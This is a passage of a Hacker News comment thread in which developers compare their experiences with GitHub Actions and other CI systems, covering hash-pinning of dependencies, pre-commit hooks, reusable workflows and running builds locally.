If the checks take more than a second, yeah, probably pre-commit is not the place/moment. Reliability is important, but so is user experience. I had companies where they ran the unit test suite at the pre-commit level, alright? And that is NOT fine. While it sounds like it’ll find issues earlier, it’ll screw your developer time if they have to wait seconds/minutes each time they fix a comma.
Marsymars 5 days ago [-]
> Why do they have a say in this?
Because at the institutional level, there isn’t the appropriate will to mandate that devs fix their local environments, and I don’t feel like burning my own political capital on that particular fight.
Agreed on the performance comments.
tenacious_tuna 6 days ago [-]
I'm one of these; I'm loathe to put anything between me and making a commit and most of our linters take several dozen seconds to run. That's unacceptable UX to me; I can disable with `--no-check`, but it's always annoying to remember that when the thing I most want to do is save my working state.
I'd rather have linting pushed into the editing process, within my IDE/VS Code/vim plugins, whathaveyou, where it can feedback-loop with my actual writing process and not just be some ancillary command I run with lots of output I never read.
Marsymars 5 days ago [-]
Oh, yeah, ours aren’t nearly that bad. Our pre-commit checks are <1s and our pre-push are <10s. (And the worst-performing pre-commit hook is Git LFS that runs through pre-commit... maybe there’s some way to improve the performance there.)
We have a lot of IDE checks, but they’re just warnings when debugging (because devs complained, IMO reasonably, that having them as errors during dev was too inconvenient during development/debugging). CI fails with any warnings, and we have devs who don’t bother to check their IDE warnings before committing and pushing to a PR.
llm_nerd 6 days ago [-]
That part immediately made me short circuit out of the piece. That sounds like a recipe for disaster and an unnecessary complexity that just brings loads of new failure modes. Not a best practice.
Trivial mistakes in PRs are almost always signs of larger errors.
ben_pfaff 7 days ago [-]
I'm new to CI auto-fixes. My early experience with it is mixed. I find it annoying that it touches my code at all, but it does sometimes allow a PR to get further through the CI system to produce more useful feedback later on. And then a lot of the time I end up force-pushing a branch that is revised in other ways, in which case I fold in whatever the CI auto-fix did, either by squashing it in or by applying it in some other way.
(Most of the time, the auto-fix is just running "cargo fmt".)
kylegalbraith 7 days ago [-]
This was an interesting read and highlighted some of the author's top-of-mind pain points and rough edges. However, in my experience, this is definitely not an exhaustive list, and there are actually many, many, many more.
Things like 10 GB cache limits in GitHub, concurrency limits based on runner type, the expensive price tag for larger GitHub runners, and that's before you even get to the security ones.
Having been building Depot[0] for the past 2.5 years, I can say there are so many foot guns in GitHub Actions that you don't realize until you start seeing how folks are bending YAML workflows to their will.
We've been quite surprised by the `container` job. Namely, folks want to try to use it to create a reproducible CI sandbox for their build to happen in. But it's surprisingly difficult to work with. Permissions are wonky, Docker layer caching is slow and limited, and paths don't quite work as you thought they did.
With Depot, we've been focusing on making GitHub Actions exponentially faster and removing as many of these rough edges as possible.
We started by making Docker image builds exponentially faster, but we have now brought that architecture and performance to our own GHA runners [1]. Building up and optimizing the compute and processes around the runner to make jobs extremely fast, like making caching 2-10x faster without having to replace or use any special cache actions of ours. Our Docker image builders are right next door on dedicated compute with fast caching, making the `container` job a lot better because we can build the image quickly, and then you can use that image right from our registry in your build job.
All in all, GHA is wildly popular. But, the sentiment around even it's biggest fans is that it could be a lot better.
By what measure is this "exponentially faster"? Surely GH doesn't take an exponential time in the number of steps of the workflow...
magicalhippo 7 days ago [-]
Depot looks nice, but also looks fairly expensive to me. We're a small B2B company, just 10 devs, but we'd be looking at 200+500 = $700/mo just for building and CI.
I guess that would be reasonable if we really needed the speedup, but if you're also offering a better QoL GHA experience then perhaps another tier for people like us who don't necessarily need the blazing speed?
suryao 7 days ago [-]
You might want to check out my product, WarpBuild[0].
We are fully usage based, no minimums etc., and our container builders are faster than others on the market.
We also have a BYOC option that gives 10x cost reduction and used by many customers at scale.
We're rolling out new pricing in the next week or two that should likely cover your use case. Feel free to ping me directly, email in my bio, if you'd like to learn more.
axelfontaine 7 days ago [-]
At https://sprinters.sh we offer AWS-hosted runners at a price point that will be much more suitable for a company like yours.
Aeolun 7 days ago [-]
Depot is fantastic. Can heavily recommend it. It’s like magic when your builds suddenly take 1m instead of 5+ just by switching the runner.
tasuki 7 days ago [-]
> Things like 10 GB cache limits in GitHub
10,000,000,000 bytes should be enough for anyone! It really is a lot of bytes...
hn_throwaway_99 7 days ago [-]
> A few days ago, someone compromised a popular GitHub Action. The response? "Just pin your dependencies to a hash." Except as comments also pointed out, almost no one does.
I used GitHub actions when building a fin services app, so I absolutely used the hash to specify Action dependencies.
I agree that this should be the default, or even the required, way to pull in Action dependencies, but saying "almost no one does" is a pretty lame excuse when talking about your own risk. What other people do has no bearing on your options here.
Pin to hashes when pulling in Actions - it's much, much safer
dijit 7 days ago [-]
I think the HN community at large had a bit of a learning experience a couple of days ago.
"Defaults matter" is a common phrase, but equally true is: "the pattern everyone recommends including example documentation matters".
It is fair to criticise the usage of GH Actions, just like it's fair to criticise common usage patterns of MySQL that eat your data - even if smarter individuals (who learn from deep understanding, or from being burned) can effectively make correct decisions, since the population of users are so affected and have to learn the hard way or be educated.
hn_throwaway_99 7 days ago [-]
I wholeheartedly agree, and perhaps it was just how I was interpreting the author's statement in the article. If it's saying that the "default" way of using GitHub Actions is dangerous and leads to subtle security footguns, I completely agree. But if you know the proper way to use and secure Actions, saying "everyone else does it a bad way" is irrelevant to your security posture.
7 days ago [-]
gazereth 7 days ago [-]
Pinning dependencies is trading one problem for another.
Yes, your builds will work as expected for a stretch of time, but that period will come to an end, eventually.
Then one day you will be forced to update those pinned dependencies and you might find yourself having to upgrade through several major versions, with breaking changes and knock-on effects to the rest of your pipelines.
Allowing rolling updates to dependencies helps keep these maintenance tasks small and manageable across the lifetime of the software.
StrLght 7 days ago [-]
You don’t have to update them manually. Renovate supports pinned GitHub Actions dependencies [1]. Unfortunately, I don’t use Dependabot so can’t say whether it does the same.
Just make sure you don’t leak secrets to your PRs. Also I usually review changes in updated actions before merging them. It doesn’t take that much time, so far I’ve been perfectly fine with doing that.
Dependabot does support pinned hashes, even adds the comment after them with the tag. Dependabot fatigue is a thing though, and blindly mashing "merge" doesn't do much for your security, but at least there's some delay between a compromise and your workflow being updated to include it.
baq 7 days ago [-]
Not pinning dependencies is an existential risk to the business. Yes it’s a tradeoff, you must assign a probability of any dependency being hijacked in your timeframe yourself, but it is not zero.
tasuki 7 days ago [-]
I don't think others were necessarily talking about "business".
Though, yes, I prefer pinning dependencies for my personal projects. I don't see why things should break when I explicitly keep them the same.
kevincox 7 days ago [-]
That isn't even the biggest problem. That breaks, and breakage gets fixed. Other than some slight internal delays there is little harm done. (You have a backup emergency deploy process that doesn't depend on GitHub anyways right?)
The real problem is security vulnerabilities in these pinned dependencies. You end up making a choice between:
1. Pin and risk a malicious update.
2. Don't pin and have your dependencies get out of date and grow known security vulnerabilities.
progbits 7 days ago [-]
But there is no transitive locking like package manager lockfiles. So if I depend on good/foo@hash, they depend on bad/hacked@v1 and V1 gets moved to malicious version I get screwed.
This is for composite actions. For JS actions what if they don't lock dependencies but pull whatever newest package at action setup time? Same issue.
Would have to transitively fork everything and pin it myself, and then keep it updated.
To make sure that you can test CI locally, the best way I've found so far is to make sure the checks can run with Nix, and then keep the CI config itself as simple as possible and just call Nix.
As for reducing boilerplate in the CI configs, GitHub Actions is a programming language with support for functions! It's just that function calls can only appear in very limited places in the program (only inside `steps`), and to define a function, you have to create a Git repository. The function call syntax is also a bit unusual, it's written with the `uses` keyword. So there is a lot of boilerplate that you can't remove this way, though there are several other yaml eDSLs hidden in GitHub Actions that address some points of it. E.g. you can create loops with `matrix`, but again, not general-purpose loops, they can only appear in a very specific syntactic location.
To really duplicate stuff, rather than copy-pasting blocks of yaml, without using a mix of these special yaml eDSLs, in the past I've used Nix and Python to generate json. Now I'm using RCL for this (https://rcl-lang.org). All of them are general-purpose yaml deduplicators, where you can put loops or function calls anywhere you want.
duijf 6 days ago [-]
> It's just that function calls can only appear in very limited places in the program (only inside `steps`), and to define a function, you have to create a Git repository.
FYI there is also `on: workflow_call` which you can use to define reusable jobs. You don't have to create a new repository for these
Usually if you’re using it, it’s because you’re forced to.
In my experience, the best strategy is to minimize your use of it — call out to binaries or shell scripts and minimize your dependence on any of the GHA world. Makes it easier to test locally too.
sepositus 7 days ago [-]
This is what I do. I've written 90% of the logic into a Go binary and GitHub Actions just calls out to it at certain steps. It basically just leaves GHA doing the only thing it's decent at...providing a local UI for pipelines. The best part is you get unit tests, can dogfood the tool in its own pipeline, and can run stuff locally (by just having the CLI nearby).
noisy_boy 7 days ago [-]
Makes migrations easier too; better to let gitHub or gitlab etc to just be the platform to host source code and trigger events which you decide how to deal with. Your CI itself should be another source controlled repo that provides the features for the application code's thin CI layer to invoke and use. That allows you to be able to run your CI locally in a pretty realistic manner too.
I have done something similar with Jenkins and groovy CI library used by Jenkins pipeline. But it wasn't super simple since a lot of it assumed Jenkins. I wonder if there is a more cleaner open source option that doesn't assume any underlying platform.
raffraffraff 7 days ago [-]
> Usually if you’re using it, it’s because you’re forced to.
Like teams.
0xbadcafebee 7 days ago [-]
I have used Travis, CircleCI, GitHub Actions, GitLab Pipelines, AWS CodeBuild/CodeDeploy, Bazel, Drone, GoCD, and Jenkins. And I have used GitLab, GitHub, and Bitbucket for hosting VCS files. (I'm the guy who manages this crap for a living, so I have used it all extensively, from startups to enterprises)
GitHub Actions is the worst possible CI platform - except for all the others. Every single CI platform has weird limitations, missing features, gotchas, footguns, pain points. Every single one requires workarounds, leaves you tearing your hair out, banging the table trying to figure out how to do something that should be simple.
Of all of them I've tried, Drone is the platonic ideal of the best, simplest, most generally useful system. It is limited. But that limitation is usually easy to work around and doesn't impose artificial constrictions. However, you won't find nearly as many canned solutions or plugins as GitHub Marketplace, and the enterprise features are few.
GHA is great because of things like Dependabot, and the million canned Marketplace actions, and it's all tightly integrated with GH's features, so you don't have to work hard to get anything advanced or specific to work. Tight integration can save you weeks to months of development time on a CI solution. I've literally seen teams throw out versioning of dependencies entirely because they weren't updating their dependencies, because there's no Dependabot orb for CircleCI. If they had just been on GHA using Dependabot it would have saved them literal years of headaches.
Jenkins is, ironically, both the most full-featured, and the absolute worst to configure/maintain. Worst design, worst security, worst everything... except it does have a plugin for everything, and a UI for everything. I hate it with the fire of a million suns. But people won't stop using it, partially because it's so goddamn configurable, and they learned it years ago and won't stop using it. If anyone wants to write a replacement, I'm happy to help (I even wrote a design doc!).
tech_tuna 6 days ago [-]
It's funny, I've used them all too. . . I like GHA overall but it sure has its quirks.
Anyone who claims that GHA is garbage and any of the others are amazing is either doing something very basic or is crazy, or lying.
At the end of the day, you run shell scripts and commands using a YAML based config language (except for Jenkins). Amazingly, it's hard to build something that does that with the right abstractions and compromises between flexibility and good hygiene.
Tainnor 6 days ago [-]
> GHA is great because of things like Dependabot [...] so you don't have to work hard to get anything advanced or specific to work.
That may have been true before GitHub decided that PRs can't access repository secrets anymore. Apparently now you can at least add these secrets to Dependabot too (which is still duplicate effort for setup and any time you rotate secrets), but at the time when the change was introduced there were only weird workarounds.
ThomasRooney 7 days ago [-]
> A few days ago, someone compromised a popular GitHub Action. The response? "Just pin your dependencies to a hash." Except as comments also pointed out, almost no one does.
I'm surprised nobody has mentioned dependabot yet. It automates this, keeping action dependencies pinned by hash automatically whilst also bringing in stable upgrades.
huijzer 7 days ago [-]
Well but that’s the problem. You cannot fully automate this. You have to manually check the diff of each dependency and only accept the dependabot PR if the changes are safe.
The only automation that I know of is cargo vet. Although it doesn’t work for GitHub Actions, the idea sounds useful. Basically, vet allows people who trust each other to vet updates. So one person verifies the diff and then approves the changes. Next, everyone who trusts this person can update the dependency automatically since it has been “vetted”.
Dependabot is only approximately as good as your tests. If you have holes in your testing that you can drive a bus through, you're gonna have a bad time.
We also, to your point, need more labels than @latest. Most of the time I want to wait a few days before taking latest, and if there have been more updates since that version, I probably don't want to touch anything for a little bit.
Common reason for 2 releases in 2 days: version 1 has a terrible bug in it that version 2 tries to fix. But we won't be certain about that one either until it's been a few more days with no patch for the patch for the patch.
7 days ago [-]
esafak 7 days ago [-]
dependabot now has beta support for delayed upgrades.
sureIy 6 days ago [-]
Thank god. Getting dependabot PRs for a major version released yesterday is just a waste of time.
presentation 7 days ago [-]
Wasn’t part of the problem though that renovate was automatically upgrading people to the compromised hash? Or is that just the fault of people configuring it to be too aggressive with upgrades?
Arbortheus 5 days ago [-]
No, someone just impersonated renovate bot and the repo author got tricked
7 days ago [-]
knazarov 7 days ago [-]
We use a combination of AWS autoscaling and Nix to make our CI pipeline bearable.
For autoscaling we use terraform-aws-github-runner which will bring up ephemeral AWS machines if there are CI jobs queued on GitHub. Machines are then destroyed after 15 minutes of inactivity so they are always fresh and clean.
For defining build pipelines we use Nix. It is used both for building various components (C++, Go, JS, etc) as well as for running tests. This helps to make sure that any developer on the team can do exactly the same thing that the CI is doing. It also utilizes caching on an S3 bucket so components that don't change between PRs don't get rebuilt and re-tested.
It was a bit of a pain to set up (and occasionally a pain to maintain), but overall it's worth it.
maccard 7 days ago [-]
There’s a lot of confident people in this thread saying CI is easy if you “just” make it dumb and keep all the logic in scripts that you farm out to.
My experience is this works for simple scripts but immediately falls apart when you start to do things like “don’t run the entire battery of integration tests against a readme
change”, or “run two builds in parallel”, or “separate the test step from the build and parallelise it even if the build is serial”.
It’s easy to wrap make build and go about your life, but that’s no easier than just using the GitHub action to call go build or mvn build. T
he complexity comes in “pull that dependency from this place that is in a private repository on GitHub/AWS because it’s 100x faster than doing it from its source”, and managing the credentials etc for all of that stuff. This is also where the “it differs from running locally” comes into it too, funnily enough.
larusso 7 days ago [-]
Interesting. I‘m also moving our CI to GitHub actions after years of using Jenkins with custom pipelines written in groovy etc. I checked out GitHub actions every now and then to feel if a move finally makes sense. I started with simple builds then tested adding our Jenkins macOS agents as self hosted runners. Just yesterday I wrote two actions to build and test a new .net project. I was able to run the whole thing with „act“ locally before running it on GitHub proper. I also played around and created a custom action in typescript (kicked off from the available predefined templates) to see how much work maintaining that means. All in all I‘m super happy and see no bigger issues. But here are some things that might be a reason:
I split CI in build system logic which should and need to run locally and just stuff that GitHub needs to execute. At best that means describing what runs in parallel, and making specific connections. Any complicated logic needs to be abstracted away behind a a setup that is itself testable. I handle it the same for our build system components. We use gradle a lot and of a few custom plugins which encapsulate specific build / automations. It’s like dividing your problem into many smaller pieces which are tested and developed in isolation.
Next to json I also used travisCI and appveyor for projects. And they all had the same (commit and pray) setup that ai hate. I wish if „act“ was a tool directly maintained by the GitHub folks though.
I don't get the obsession with YAML and making things declarative that really should not be declarative.
I'm so much happier on projects where I can use the non-declarative Jenkins pipelines instead of GH Actions or BB pipelines.
These YAML pipelines are bad enough on their own, but throw in a department that is gatekeeping them and use runners as powerful as my Raspberry Pi and you have a situation where a lot of developers just give up and run things locally instead of the CI.
hinkley 7 days ago [-]
I haven't tried to step through Scons, so that may be a system that looks like how I want it to look but fails entirely to deliver on its promises for all I know.
I think there's a place for making a builder that looks imperative, but can work out a tree of actions and run them. Gulp is a little bit this way, but again I haven't tried to breakpoint through it either.
If the next evolution in DevEx is not caring about what your code looks like in a stepping debugger, then the one after it will be. Making libraries that present a tight demo app for the Readme.md file and then are impossible to do anything tricky with or god forbid debug just needs to fucking stop. Yesterday. And declarative systems are almost always the worst.
neuroelectron 6 days ago [-]
Yes I have to agree Jenkins is the best solution but it's not the hot new thing, AI powered etc. It just works and that's not how you grow your org.
999900000999 7 days ago [-]
Whatever happened to picking the right tool for the job ?
It looks like they have a very specific and unique build process which they really should handle with something more customizable like Jenkins. Instead they're using something that's really intended for quick and light deployments for intense dev ops setup.
I really like GitHub actions, but I'm only doing very simple things. Don't call a fork bad because it's not great when you're eating soup
ohgr 7 days ago [-]
The only people who picked the right tool for the job are the people you don't hear about.
999900000999 7 days ago [-]
That's a good point, at least once a week someone decides that instead of reading the documentation and understanding the limitations of the technologies or frameworks they want to use...
They either just write a long blog post about how they can't screw in nails with a hammer.
Or they leave their security rules wide open and about half the comments are like, we need tools which stop us from doing stupid things.
No other industry works like this.
timewizard 6 days ago [-]
We use GitHub actions. We have a single job step. It has an "if: false" property on it. When triggered the action immediately completes and no runners are engaged.
What it really does is fire off a WebHook. Repository custom properties and the name of the action are properties that are included in the workflow_job webook. With this you can do anything you want and you're not at all constrained by YAML or runners.
lolinder 7 days ago [-]
> something more customizable like Jenkins
If they had, we'd be reading a different article about how terribly complex and unintuitive Jenkins is.
CI is just a very very hard problem and no provider makes it easy.
GauntletWizard 7 days ago [-]
Whenever I get mad at GitHub Actions, I refer to it by it's true name: VisualSourceSafe Actions. Because that's what it is, and it shows. If you check out their Action Runner's source code[1], you'll find the VSS prefix all over, showing it's lineage.
I know they've fixed VSS ages ago, but for many years it was buggy af and would catastrophically lose data on automerges that it confidently made and was wrong.
I had a coworker who called it Visual Sorta-Safe which is just about the best parody name I've ever heard in my entire career.
7 days ago [-]
rurban 7 days ago [-]
Oh, C#. Nice!
silverwind 7 days ago [-]
GHA is full of such obure behaviours. One I recently discovered is that one action can not trigger another:
If one action pushes a tag to the repo, `on:tag` does not trigger. The workaround apparently is to make the first action push the tag using a custom SSH key, which magically has the ability to trigger `on:tag`.
mook 7 days ago [-]
That actually seemed reasonable when I hit it, because you can easily accidentally have an action triggered on commit that makes a new commit, ending up in an infinite loop.
The workaround is to use a token tied to you instead of GitHub Actions, so you get charged (or run out of quota).
joshstrange 7 days ago [-]
> The workaround is to use a token tied to you instead of GitHub Actions, so you get charged (or run out of quota).
You get charged no matter what, a personal access token doesn’t change anything.
If they are concerned about infinite loops then put a limit on how many workflows can be triggered but another workflow. Each time a workflow chains off another pass along some meta data of “runsDeep” and stop when that hits X, which can be configured.
No, requiring a PAT to kick off a workflow from a workflow is gross and makes zero sense. I don’t want every tag associated with my user, I want it to be generic, the repo itself should be attributed. The only way to solve this is to create (and pay for) another GH user that you create PAT tokens under. A bunch of overhead, cost, and complexity for no good reason.
> When you use the repository's GITHUB_TOKEN to perform tasks, events triggered by the GITHUB_TOKEN, with the exception of `workflow_dispatch` and `repository_dispatch`, will not create a new workflow run.
It has bitten me in the rear before too. I use this pattern a lot when I publish a new version, which tags a piece of code and then marks assets as part of that version (for provenance reasons I cannot rebuild code).
geewee 7 days ago [-]
We're also struggling with this, as we'd love to e.g. just run a formatter and commit the changed code in CI rather than just fail the code.
jicea 7 days ago [-]
Genuine question: what's the GitLab equivalent of GitHub Actions?
I'm using GitHub Actions to easily reuse some predefined job setup (like installing a certain Python version on Linux, macOS, Windows runners). For these tyoe of tasks, I find GitHub actions very useful and convenient. If you want to reuse predefined jobs, written by someone else, with GitLab CI/CD, what can I use?
include:component is usually what you want now, you can version your components (Semver), add a nice readme and it is somewhat integrated in the gitlab UI. Not sure about the other include: ones, but you can also define inputs for component and use them at arbitrary places like template variables.
Since the integration is done statically, it means gitlab can provide you a view of the pipeline script _after_ all components were included, but without actually running it.
We are using this and it is so nice to set up. I have a lot of gripes with other gitlab features (e.g. environments, esp. protected ones and their package registry) but this is one they nailed so far.
never_inline 6 days ago [-]
Doesn't include:component still require all your shell script to be written inside YAML? or is there a way to move the logic to a, for instance, .sh file and call it from YAML?
mdaniel 6 days ago [-]
I realize this may be splitting hairs, but pedantically there's nothing in GitLab CI's model that requires shell; it is, as best I can tell, 100% docker image based. The most common setup is to use "script:" (or its "before_script:" and "after_script:" friends) but if you wanted to write your pipeline job in brainfuck, you could have your job be { image: example.com/brainfuckery:1, script: "" } and no shell required[1]
I'd say write a Python CLI (or any language you're comfortable with) which does all the actions (setup, deploy), download it and use it in the CI (or install on the runner images if you control them). That way you can use same workflow (command) in local development and CI.
There is a gitlab CI feature `include`, but you pretty much have to write shell scripts inside YAML, losing on whole developer experience (shellcheck etc..). I would recommend this way only if you can't factor your code into a CLI in proper language.
HdS84 7 days ago [-]
There is nothing.
Oh sure there is include, but that's like most gitlab features: it marks a nice shiny checkbox in some management presentation. But usefulness in the real world is limited.
But hey let's do secops oh no AI instead!
ed_mercer 7 days ago [-]
Kaniko + base container images
ManBeardPc 7 days ago [-]
CI environments like Gitlab or Github are my nemesis. Another technology that everyone swears is absolute necessary but somehow makes everything more complicated. The provided environments in companies so far are hell 100% the time and managed by inexperienced personnel with zero or little programming experience.
* Barely reproducible because things like the settings of the server (environment variables are just one example) are not version controlled.
* Security is a joke.
* Programming in YAML or any other config format is almost always a mistake.
* Separate jobs often run in their own container, losing state like build caches and downloaded dependencies. Need to be brought back by adding remote caches again.
* Massive waste of resources because too many jobs install dependencies again and again or run even if not necessary. Getting the running conditions for each step right is a pain.
* The above points make everything slow as hell. Spawning jobs takes forever sometimes.
* Bonus points if everything is locked down and requires creating tickets.
* Costs for infra often keep expanding towards infinity.
We already have perfectly fine runners: the machines of the devs. Make your project testable and buildable by everyone locally. Keep it simple and avoid (brittle) dependencies. A build.sh/test.sh/release.sh (or in another programming language once it gets more complicated, see Bun.build, build.zig) and a simple docker-compose.yml that runs your DB, Pub-Sub or whatever. Works pretty well in languages like Go, Rust or TS (Bun). Having results in seconds even if you are offline or the company network/servers have issues is a blessing for development.
There are still things like the mentioned heavy integration tests, merges to main and the release cycle where it makes sense to run it in such environments. I'm just not happy how this CI/CD environments work and are used currently.
riperoni 7 days ago [-]
To be honest, some of your points can be a hindrance, but as a GitLab user, others are solveable without massive efforts.
- env vars can be scripted, either in YAML or through dotenv files. Dotenv files would also be portable to dev machines
- how is security a joke? Do you mean secrets management? Otherwise, i don't see a big issue when using private runners with containers
- jobs can pass artifacts to each other. When multiple jobs are closely interwined, one could merge them?
- what dependency installation do you mean? You can use prebuilt images with dependencies for one. And ideally, you build once in a pipeline and use the binary as an artifact in other jobs?
- in my experience, starting containers is not that slow with a moderately sized runner (4-8 cpus). If anything, network latency plays a role
- not being able to modify pipelines and check runners must be annoying, I agree
- everything from on-prem license to SaaS license keeps costing more. Somewhere, expenses are made, but that can be optimized if you are in a position to have a say?
By comparing dev machines to runners, you miss one important aspect: portability, automation and testing in different environments. Except when you have a full container engine on your dev machine with flexible network configs, there can be missed issues.
Also, you need to prime every dev to run the CI manually or work with hooks, and then you can have funny, machine-specific problems. So this already points to a central CI-system by making builds repeatable and in the same from-scratch envirnment.
As for deployment, those shouldn't be made from dev machines, so automated pipelines are the go-to here.
Also autmated test reporting goes out the window for dev machines.
ManBeardPc 7 days ago [-]
TLDR: True, most things can be fixed if configured and setup properly. Just the way the are often used and provided examples encourage many of the problems.
Env vars can be scripted, many companies use a tree of instance/group/project scoped vars though, leading to easily breaking some projects when things higher up change. Solvable for sure, guidelines in companies make it a pain. There are other settings like allowed branch names etc. that can break things.
With security, yes I mean mostly secrets management. Essentially everyone who can push to any branch has access to every token. Or just having a typo or mixing up some variables lead to stuff being pushed to production. Running things in the public cloud is another issue.
Passing artifacts between jobs is a possibility. Still leads to data pushed between machines. Merging jobs is also possible, just defeats the purpose of having multiple jobs and stages. The examples often show a separation between things like linting, testing, building, uploading, etc. so people split it up.
With dependencies I mean everything you need to execute jobs. OS, libraries, tools like curl, npm, poetry, jfrog-cli, whatever. Prebuilt images work, but it is another thing you have to do yourself. Building more containers, storing them, downloading them. Also containers are not composable, so for each project or job has its own. The curse of being stateless and the way Docker works.
Starting containers is not slow on a good runner. But I noticed significant delays on many Kubernetes clusters, even if the nodes are <1% CPU. Startup times of >30s are common. Still, even if it would be faster it is still a delay that quickly adds up if you have many jobs in a pipeline.
I agree that dev machines and runners have different behavior and properties. What I mean is local-first development. For most tasks it is totally fine to run a different version of Postgres, Redis and Go for example. Docker containers bring it even closer to a realistic setup. What I want is quick feedback and being able to see the state of something when there a bugs. Not needing to do print debugging via git push and waiting for pipelines. Pipelines that setup a fresh environment and tear it down after are nice for reproducibility, but prevent me to inspect the system aside from logs and other artifacts. Certainly this doesn't mean you shouldn't have a CI/CD environment at all, especially for releases/production deployments.
z3t4 7 days ago [-]
It's such a waste of resources to rebuild an operating system every time you want to run some tests, and these CI machines are much less powerful then personal computers so it takes much longer in the cloud too.
If you have your CI in your own scripts it will be easy to migrate between CI environments too. build: ./buuild.sh test: ./test.sh deploy: ./deploy.sh maybe pass some env variables to the scripts.
There are some advantages to CI platforms, like nightly build/test and automatic security scan on already deployed software, so that you will be notified when something suddenly stops working or a vulnerability is discovered.
ManBeardPc 7 days ago [-]
The resource usage is really a big problem (if you don't sell them). Being stateless is a blessing and curse at the same time. Reproducible but forces you to feed in all required data every time.
Simple scripts like these are enough for most projects and it is a blessing if you can execute them locally. Having a CI platform doing it automatically on push/merge/schedule is still possible and makes migrations to other platforms easier.
mab122 7 days ago [-]
but then, but then your corporate provided laptop with 8GB RAM and 128GB with locked down Windows Entprise™® may need 1000th of security policy exceptions and won't even fit all dependencies on its disk. Not to mention that it would be building for like 10h. Think of the shareholders! The corporation would have to buy actually usable hardware for it's workers! Think of the cost! /j
For real tho, not every project can be build by everyone locally, but at least parts of it should be locally runnable for devs to be able work (at all IMO).
What I am noticing is more and more coding is being done on some server somewhere Github Codespaces anyone? Google Colab? etc.
What I am also noticing is that this tools like GH-A there is not really a way to test the CI code other than.. commit, push, wait, commit, push, wait...
That's just absurd to me. Obviously all CIs have some quirks that sometimes you have _just run it_ and see if it works but this... it's like that for everything! Abusrd I say!
ManBeardPc 7 days ago [-]
True, many of the problems are not solvable by technology alone. Hostile environments can be created for every approach if the corporation doesn't know/care how to do it properly. Luckily I'm blessed that my employers mostly give me admin permissions on my machine and provide decent hardware. The hardware my customers force me to use though... lets say at least I have some free time for other things.
Laptops are a lot cheaper then the cloud bills I have seen so far. Penny pinching every tiny thing for <100$/€, but cloud seems to run on an infinite magic budget...
drpossum 7 days ago [-]
Why even do automated testing too? Devs should just test their code. If they were doing their jobs there would be no bugs./s
Your opinions are so regressive you really should consider going into management.
ManBeardPc 7 days ago [-]
What about being able to run stuff locally even hints towards me having such an opinion? The processes including tests and release are still automated, the trigger and where they run are different.
Nowhere do I say you shouldn't use CI/CD at all. I just don't like the current CI/CD implementations and the environments/workflows companies I worked for so far provide on top of them.
The regressive thing is putting everything ONLY on a remote machine with limited access and control, taped together by a quirky YAML-based DSL as a programming language and still requiring me to program most stuff myself.
rejschaap 7 days ago [-]
We've all been there:
$ git l
* cbe9658 8 weeks ago rejschaap (HEAD -> add-ci-cd) Update deploy.yml
* 0d78a6e 8 weeks ago rejschaap Update deploy.yml
* e223056 8 weeks ago rejschaap Update deploy.yml
* 8e1e5ea 8 weeks ago rejschaap Update deploy.yml
* 459b8ea 8 weeks ago rejschaap Update deploy.yml
* a104e80 8 weeks ago rejschaap Update deploy.yml
* 0e11d40 8 weeks ago rejschaap Update deploy.yml
* 727c1d3 8 weeks ago rejschaap Create deploy.yml
rejschaap 2 days ago [-]
Better formatting
$ git l
* cbe9658 8 weeks ago rejschaap (HEAD -> add-ci-cd) Update deploy.yml
* 0d78a6e 8 weeks ago rejschaap Update deploy.yml
* e223056 8 weeks ago rejschaap Update deploy.yml
* 8e1e5ea 8 weeks ago rejschaap Update deploy.yml
* 459b8ea 8 weeks ago rejschaap Update deploy.yml
* a104e80 8 weeks ago rejschaap Update deploy.yml
* 0e11d40 8 weeks ago rejschaap Update deploy.yml
* 727c1d3 8 weeks ago rejschaap Create deploy.yml
mcdeltat 6 days ago [-]
This is a fascinating read as someone who is currently working on migrating CI platforms. We deal with hundreds of internal repos where many CI platforms just don't scale well. We are probably going to choose Github Actions because it looks like the simplest, least-BS option. The problems the author mentions would be the least of our concerns.
Totally agree with other comments saying to keep as much logic out of CI config as possible. Many CI features are too convoluted for their own good. Keep it really simple. You can use any CI platform and have a shit time if you don't take the right approach.
jFriedensreich 7 days ago [-]
I am completely switching my mental model of what a ci/cd system should be at the moment: i use docker compose for absolutely everything possible. unit tests? runs as part of the container build. linear build dependent steps? multi stage docker biuld. DAG of build steps? dependencies in docker compose. This way every developer has the same system that ci/cd uses locally. debugging the dev setup is the same as debugging the ci/cd. The purpose of the actual ci/cd is reduced to handling/configuring triggers, handling env vars/secrets and triggering the docker compose command with the proper selected docker context
This also reduces the lock in by orders of magnitude.
heldrida 6 days ago [-]
Sounds like a good option. I’ll try something similar next time.
peterldowns 7 days ago [-]
These are all real pains, author definitely has done a lot of work in Github Actions; respect. I'm sure these notes will save a lot of people a lot of frustration in the future, since Github Actions isn't going away --- it's too damn convenient.
I wonder why they chose to move back to Github Actions rather than evaluate something like Buildkite? At least they didn't choose Cloud Build.
ZeWaka 7 days ago [-]
Yep, I've run into every one of these issues in my time working with the CI. It's still leagues beyond the old Azure DevOps pipelines or god forbid, Jenkins.
I think incremental progress in the CI front is chugging along nicely, and I really haven't seen any breathtaking improvements from other solutions I've tried, like CircleCI.
dboreham 7 days ago [-]
There's a meta-problem here: GitHub Actions is one of those things that when you first encounter it, is presented as: "we've got it all figured out and all goin on here, and anyone who is scratching their head must be dumb". This pattern, in my experience, shows up frequently in the software realm. Then, typically there follows some period where you try to do whatever you need to do by reading docs and copying what you see others do. Frustration and head scratching grows finally culminating in a process of "Ok WTF are the core concepts of this thing, what were they thinking when they designed it, what is it really going???".
The article is what you end up finding after that stage has been gone through.
The conclusion of course is that whoever invented this stuff really wasn't thinking clearly and certainly didn't have the time to write decent documentation to explain what they were thinking. And now the whole world has to try to deal with their mess.
My theory as to how this ends up happening is that the people creating the thing began with some precursor thing as their model. They made the new thing as "old thing, with a few issues fixed". Except they didn't fully understand the concepts in that thing, and we never got to see that thing. You'll see many projects that have this form: bun is "yarn fixed". Yarn is "npm fixed". And so on. None of these projects ever has to fully articulate their concepts.
lemagedurage 7 days ago [-]
I wonder if the complexity of fixing trivial code mistakes in CI is worth it compared to catching them in a pre-commit hook.
matharmin 7 days ago [-]
In my opinion neither hooks nor CI should ever make changes to code automatically. When I commit changes, I want to see exactly what I commit, and not have some system change it at the last minute.
Instead, have tooling to do that before committing (vscode format-on-save, or manually run a task), then have a pre-commit hook just do a sanity-check on that. It only needs to check modified files, so usually very fast.
